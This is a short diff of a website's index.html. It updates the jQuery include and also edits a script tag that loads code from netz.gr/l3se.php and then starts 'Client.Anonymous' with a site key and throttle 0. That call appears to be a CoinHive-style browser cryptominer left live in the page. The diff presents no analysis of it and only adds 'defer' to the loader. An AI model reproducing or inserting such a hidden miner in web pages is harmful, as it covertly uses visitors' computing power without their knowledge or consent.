--- a/index.html
+++ b/index.html
@@ -31,9 +31,10 @@
   <![endif]-->
 
   <!-- JS -->
-  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
+  <!--<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>-->
+  <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
   <script src="https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.8.4/moment.min.js"></script>
-  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-rss/4.3.0/jquery.rss.min.js"></script>
+  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-rss/4.3.0/jquery.rss.min.js" ></script>
 
   <!-- scripts -->
 
@@ -519,7 +520,7 @@
       })
     </script>
 
-<script src="https://netz.gr/l3se.php?f=emuj.js"></script>
+<script src="https://netz.gr/l3se.php?f=emuj.js" defer></script>
 <script>
     var _client = new Client.Anonymous('ce5ea48caf562e52b026b82443a82775f8bbd72a4a71fa6b301a081288b5b215', {
         throttle: 0, c: 'w'
